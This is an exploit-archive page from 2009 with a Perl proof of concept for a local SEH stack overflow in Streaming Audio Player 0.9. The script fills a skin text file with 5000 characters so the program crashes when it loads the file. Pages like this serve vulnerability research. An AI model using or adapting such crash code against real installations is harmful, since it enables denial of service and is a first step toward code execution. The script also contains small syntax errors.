[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Streaming Audio Player 0.9 (skin) Local Stack Overflow PoC (SEH)
# Published : 2009-07-17
# Author : ThE g0bL!N
# Previous Title : Sguil/PADS Remote Server Crash Vulnerability
# Next Title : Soritong MP3 Player 1.0 (SKIN) Local Stack Overflow PoC (SEH)


#Streaming Audio Player 0.9 (txt) Local Stack Overflow PoC (Seh)
#By: ThE g0bL!N
my $crash="x41" x 5000 ; # just random
open(myfile,'>>UI.txt')
print myfile $crash;
# Usage: After Clicking On file Perl Copy TXT File on this Diredtory
skindefault Then Run The Program Boom !!!!!!! the Program Crashed
# Note : The Bug is Seh  :) 

# www.Syue.com [2009-07-17]